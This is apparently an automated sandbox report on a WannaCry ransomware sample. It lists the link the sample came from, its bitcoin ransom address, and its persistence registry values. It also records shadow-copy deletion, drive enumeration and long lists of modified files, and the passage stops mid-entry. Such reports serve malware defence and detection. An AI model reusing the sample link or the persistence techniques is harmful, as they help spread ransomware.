Analysis
-
max time kernel
503s -
max time network
556s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
14-08-2024 16:05
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://drive.google.com/file/d/1ycPVXB8LX19SOkPPnUO6OX3YzrxzRENc/view?usp=sharing
Resource
win10v2004-20240802-en
Errors
General
-
Target
https://drive.google.com/file/d/1ycPVXB8LX19SOkPPnUO6OX3YzrxzRENc/view?usp=sharing
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCrypt0r(1).zip\@[email protected]
wannacry
115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
Signatures
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Program Files (x86)\\Windows\\Error file remover\\fatalerror.exe" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Program Files (x86)\\Windows\\Error file remover\\fatalerror.exe" msiexec.exe -
Wannacry
WannaCry is a ransomware cryptoworm.
-
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation wscript.exe -
Drops startup file 2 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD9035.tmp [email protected] File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD902E.tmp [email protected] -
Executes dropped EXE 23 IoCs
pid Process 5208 is-5VN37.tmp 5896 wizard.exe 5176 rhc3stj0e147.exe 6044 pphc7stj0e147.exe 5740 taskdl.exe 4980 @[email protected] 4420 @[email protected] 5516 taskhsvc.exe 3992 taskdl.exe 4716 taskse.exe 2068 @[email protected] 6984 taskdl.exe 6464 taskse.exe 6208 @[email protected] 5548 taskdl.exe 1968 taskse.exe 1928 @[email protected] 532 taskse.exe 6388 @[email protected] 6760 taskdl.exe 6660 taskse.exe 4076 @[email protected] 6100 taskdl.exe -
Loads dropped DLL 32 IoCs
pid Process 5896 wizard.exe 2588 [email protected] 2588 [email protected] 2588 [email protected] 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5176 rhc3stj0e147.exe 5516 taskhsvc.exe 5516 taskhsvc.exe 5516 taskhsvc.exe 5516 taskhsvc.exe 5516 taskhsvc.exe 5516 taskhsvc.exe 5516 taskhsvc.exe 5516 taskhsvc.exe 5188 [email protected] 5188 [email protected] 5032 MsiExec.exe 5032 MsiExec.exe 5032 MsiExec.exe 5032 MsiExec.exe 5032 MsiExec.exe 5032 MsiExec.exe 5032 MsiExec.exe 5032 MsiExec.exe 5032 MsiExec.exe 5032 MsiExec.exe 1460 MsiExec.exe 5032 MsiExec.exe 5188 [email protected] 5032 MsiExec.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 3372 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/memory/5612-3550-0x0000000000400000-0x000000000044F000-memory.dmp upx -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\SMrhc3stj0e147 = "C:\\Program Files (x86)\\rhc3stj0e147\\rhc3stj0e147.exe" [email protected] Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\qyedrxmniilpouj597 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\Temp1_WannaCrypt0r(1).zip\\tasksche.exe\"" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 336 5032 MsiExec.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\B: wizard.exe File opened (read-only) \??\A: [email protected] File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\A: wizard.exe File opened (read-only) \??\E: wizard.exe File opened (read-only) \??\H: [email protected] File opened (read-only) \??\Z: [email protected] File opened (read-only) \??\H: wizard.exe File opened (read-only) \??\I: [email protected] File opened (read-only) \??\X: [email protected] File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\N: wizard.exe File opened (read-only) \??\Q: [email protected] File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\K: wizard.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\S: wizard.exe File opened (read-only) \??\J: [email protected] File opened (read-only) \??\P: [email protected] File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\M: wizard.exe File opened (read-only) \??\U: wizard.exe File opened (read-only) \??\L: [email protected] File opened (read-only) \??\V: [email protected] File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\N: [email protected] File opened (read-only) \??\U: [email protected] File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\J: wizard.exe File opened (read-only) \??\O: wizard.exe File opened (read-only) \??\Y: [email protected] File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\L: wizard.exe File opened (read-only) \??\B: [email protected] File opened (read-only) \??\G: [email protected] File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\E: [email protected] File opened (read-only) \??\T: [email protected] File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: wizard.exe -
File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 9 IoCs
flow ioc 285 raw.githubusercontent.com 287 raw.githubusercontent.com 9 drive.google.com 10 drive.google.com 16 drive.google.com 286 raw.githubusercontent.com 5 drive.google.com 11 drive.google.com 284 raw.githubusercontent.com -
Drops file in System32 directory 18 IoCs
description ioc Process File created C:\Windows\SysWOW64\fpfstb.dll [email protected] File created C:\Windows\SysWOW64\pphc7stj0e147.exe rhc3stj0e147.exe File opened for modification C:\Windows\SysWOW64\@AppHelpToast.png wizard.exe File opened for modification C:\Windows\SysWOW64\Bthprops\@BthpropsNotificationLogo.png wizard.exe File opened for modification C:\Windows\SysWOW64\MSDRM\MsoIrmProtector.ppt wizard.exe File opened for modification C:\Windows\SysWOW64\RCXC768.tmp [email protected] File opened for modification C:\Windows\SysWOW64\@VpnToastIcon.png wizard.exe File opened for modification C:\Windows\SysWOW64\MSDRM\MsoIrmProtector.doc wizard.exe File created C:\Windows\SysWOW64\fpfstb.dll [email protected] File created C:\Windows\SysWOW64\fpfstb.dll [email protected] File opened for modification C:\Windows\SysWOW64\@AudioToastIcon.png wizard.exe File opened for modification C:\Windows\SysWOW64\@EnrollmentToastIcon.png wizard.exe File opened for modification C:\Windows\SysWOW64\SecurityAndMaintenance.png wizard.exe File opened for modification C:\Windows\SysWOW64\SecurityAndMaintenance_Error.png wizard.exe File opened for modification C:\Windows\SysWOW64\@WirelessDisplayToast.png wizard.exe File opened for modification C:\Windows\SysWOW64\DefaultAccountTile.png wizard.exe File opened for modification C:\Windows\SysWOW64\MSDRM\MsoIrmProtector.xls wizard.exe File opened for modification C:\Windows\SysWOW64\SecurityAndMaintenance_Alert.png wizard.exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" [email protected] Set value (str) \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" @[email protected] -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-80_contrast-black.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosLogoExtensions.targetsize-16.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsAppList.targetsize-60_altform-unplated.png wizard.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Transit\contrast-white\MedTile.scale-125.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraWideTile.scale-100.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Sun.png wizard.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.Windows.Photos_2019.19071.12548.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\PhotosAppList.contrast-black_scale-100.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-36_altform-unplated_contrast-white.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\OneNoteMediumTile.scale-100.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebMediaExtensions_1.0.20875.0_x64__8wekyb3d8bbwe\Assets\contrast-white\BadgeLogo.scale-200_contrast-white.png wizard.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-white_scale-180.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-24_altform-unplated_contrast-black.png wizard.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Yahoo-Dark.scale-125.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosStoreLogo.png wizard.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-32_altform-lightunplated.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\Images\Ratings\Yelp7.scale-200.png wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Complex Machine.pdf wizard.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxA-Advanced-Dark.scale-400.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Assets\PhotosWideTile.contrast-black_scale-200.png wizard.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarWideTile.scale-125.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-black\WideLogo.scale-100_contrast-black.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteAppList.targetsize-20_altform-unplated.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\1.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\Office365LogoWLockup.scale-100.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-black\StoreLogo.scale-400_contrast-black.png wizard.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxAccountsSplashLogo.scale-100.png wizard.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\SAMPLES\SOLVSAMP.XLS wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionLargeTile.scale-100.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\osf\refresh_16x16x32.png wizard.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Folder-48.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalculatorSplashScreen.contrast-black_scale-200.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraSmallTile.contrast-black_scale-100.png wizard.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.scale-100.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteNotebookWideTile.scale-400.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WebpImageExtension_1.0.22753.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-30_altform-unplated_contrast-white.png wizard.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\RTL\contrast-white\LargeTile.scale-125.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-black\PeopleAppList.targetsize-16.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\StoreLogo.scale-150.png wizard.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\EmptyShare.scale-125.png wizard.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\EmptyView-Dark.scale-150.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\PeopleAppList.scale-125.png wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\arrow-left.png wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\rhp_world_icon_hover_2x.png wizard.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-black_scale-100.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\ms-logo-no-text.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-white\MedTile.scale-400_contrast-white.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherImages\210x173\82.jpg wizard.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\YahooPromoTile.scale-200.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-black\MixedRealityPortalMedTile.scale-125_contrast-black.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_neutral_split.scale-125_8wekyb3d8bbwe\Win10\SplashScreen.scale-125.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSectionLargeTile.scale-150.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\ReactAssets\assets\RNApp\app\uwp\images\offer_cards\subs-illustration.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubWideTile.scale-100_contrast-white.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\OrientationControlMiddleCircle.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\video_offline_demo_page1.jpg wizard.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsStore_11910.1002.5.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-white\SplashScreen.scale-125.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-40_contrast-black.png wizard.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxCalendarLargeTile.scale-400.png wizard.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\VisualElements\LogoCanary.png wizard.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\basicstylish.dotx wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\Background_RoomTracing_06.jpg wizard.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\FlagToastQuickAction.scale-80.png wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\share_icons2x.png wizard.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-16_contrast-white.png wizard.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-c..ngshellapp.appxmain_31bf3856ad364e35_10.0.19041.84_none_24f8aafdaceaf0b5\Square44x44Logo.targetsize-80_altform-unplated.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-f..ysafety-refreshtask_31bf3856ad364e35_10.0.19041.1266_none_d375b5361b806b32\wpcmon.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-sechealthui.appxmain_31bf3856ad364e35_10.0.19041.964_none_90d24b203cdf4e96\Square71x71Logo.contrast-white_scale-400.png wizard.exe File opened for modification C:\Windows\ImmersiveControlPanel\images\TinyTile.scale-125.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-c..ngshellapp.appxmain_31bf3856ad364e35_10.0.19041.84_none_24f8aafdaceaf0b5\Square44x44Logo.targetsize-20.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.1_none_75cd350cc8b5dbcf\i_chartzoom_reset.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-s..ast-white.searchapp_31bf3856ad364e35_10.0.19041.1_none_2f147508fcb33106\AppListIcon.targetsize-40.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-sechealthui.appxmain_31bf3856ad364e35_10.0.19041.964_none_90d24b203cdf4e96\Wide310x150Logo.contrast-black_scale-200.png wizard.exe File opened for modification C:\Windows\SystemResources\Windows.UI.Search\Images\logo.contrast-white_scale-100.png wizard.exe File opened for modification C:\Windows\SystemResources\Windows.UI.ShellCommon\Images\NearShare.scale-150.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-m..nt-browser.appxmain_31bf3856ad364e35_10.0.19041.1_none_b1e502c19c2a358b\Square150x150Logo.contrast-black_scale-150.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.1_none_75cd350cc8b5dbcf\i_previous.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-microsoftedge_31bf3856ad364e35_10.0.19041.264_none_ef195f564f00d259\MicrosoftEdgeEPUB.targetsize-63.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-ui-shellcommon-core_31bf3856ad364e35_10.0.19041.1_none_91b1f58702057373\SIMLockToast.scale-125_contrast-white.png wizard.exe File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\Assets\WideLogo310x150.scale-200.png wizard.exe File opened for modification C:\Windows\SystemResources\Windows.UI.Search\Images\logo.contrast-black.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-m..nt-browser.appxmain_31bf3856ad364e35_10.0.19041.1_none_b1e502c19c2a358b\Square71x71Logo.contrast-white_scale-100.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-sechealthui.appxmain_31bf3856ad364e35_10.0.19041.153_none_90dc0b923cd83016\Square71x71Logo.contrast-white_scale-100.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-ui-shell-component_31bf3856ad364e35_10.0.19041.746_none_2b9acc2d69574796\PasswordExpiry.scale-200.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-ui-shellcommon-core_31bf3856ad364e35_10.0.19041.1_none_91b1f58702057373\NearShare.scale-200.png wizard.exe File opened for modification C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\assets\NarratorUWPSplashScreen.scale-200_contrast-white.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-m..nt-browser.appxmain_31bf3856ad364e35_10.0.19041.844_none_d9eb415c5b9dbe4e\Square150x150Logo.contrast-white_scale-150.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-u..usnotificationuxexe_31bf3856ad364e35_10.0.19041.1266_none_e8d910c7c702b558\Snooze_80.contrast-white.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.19041.173_none_6486f23c2831aaf3\InputApp\InputApp\Assets\SplashScreen.scale-125.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.19041.173_none_6486f23c2831aaf3\InputApp\InputApp\Assets\StoreLogo.scale-125.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-microsoftedge_31bf3856ad364e35_10.0.19041.264_none_ef195f564f00d259\Square150x150Logo.scale-400.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-s..ets.icons.searchapp_31bf3856ad364e35_10.0.19041.1_none_ceba36fd1b479c4c\SmallTile.scale-100.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-s..okerplugin.appxmain_31bf3856ad364e35_10.0.19041.1202_none_d081f9868ac0a804\PasswordExpiry.contrast-white_scale-125.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-t..honyinteractiveuser_31bf3856ad364e35_10.0.19041.906_none_a6600355b5f69459\SendPhone.scale-300.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-ui-shell-component_31bf3856ad364e35_10.0.19041.746_none_2b9acc2d69574796\PasswordExpiry.contrast-white_scale-400.png wizard.exe File opened for modification C:\Windows\SystemResources\Windows.UI.AccountsControl\Images\Outlook.Theme-Light_Scale-125.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-m..nt-browser.appxmain_31bf3856ad364e35_10.0.19041.844_none_d9eb415c5b9dbe4e\Square44x44Logo.contrast-white_scale-125.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.423_none_9de80b9d881a1ebd\disconnectIcon.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-microsoftedge_31bf3856ad364e35_10.0.19041.264_none_ef195f564f00d259\MicrosoftEdgeSquare44x44.targetsize-16_altform-unplated.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-n..quickstart.appxmain_31bf3856ad364e35_10.0.19041.1_none_4a388618f6365227\NarratorUWPSquare44x44Logo.targetsize-80_contrast-white.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.19041.1_none_97b0a47239f6db64\PeopleLogo.scale-200_contrast-white.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-s..okerplugin.appxmain_31bf3856ad364e35_10.0.19041.1202_none_d081f9868ac0a804\PasswordExpiry.scale-150.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.19041.1266_none_fb76f6fb7e78a373\InputApp\InputApp\Assets\SquareLogo310x310.scale-100.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-c..riencehost.appxmain_31bf3856ad364e35_10.0.19041.1266_none_777e4c5802d14c18\storelogo.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-onecoreua..uetooth-userservice_31bf3856ad364e35_10.0.19041.153_none_e669b22d011fc6b2\HandwritingSystemToastIcon.contrast-white.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-i..ntrolpanel.appxmain_31bf3856ad364e35_10.0.19041.1_none_d0af17ec366548f3\splashscreen.contrast-white_scale-125.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-m..nt-browser.appxmain_31bf3856ad364e35_10.0.19041.1_none_b1e502c19c2a358b\Square310x310Logo.scale-150.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-m..nt-browser.appxmain_31bf3856ad364e35_10.0.19041.1_none_b1e502c19c2a358b\Square310x310Logo.scale-400.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-m..nt-browser.appxmain_31bf3856ad364e35_10.0.19041.844_none_d9eb415c5b9dbe4e\Square150x150Logo.contrast-white_scale-400.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.19041.423_none_bfcb7b02f95b1e52\PeopleLogo.scale-100.png wizard.exe File opened for modification C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\network\Images\NetworkStatus-Warning.png wizard.exe File opened for modification 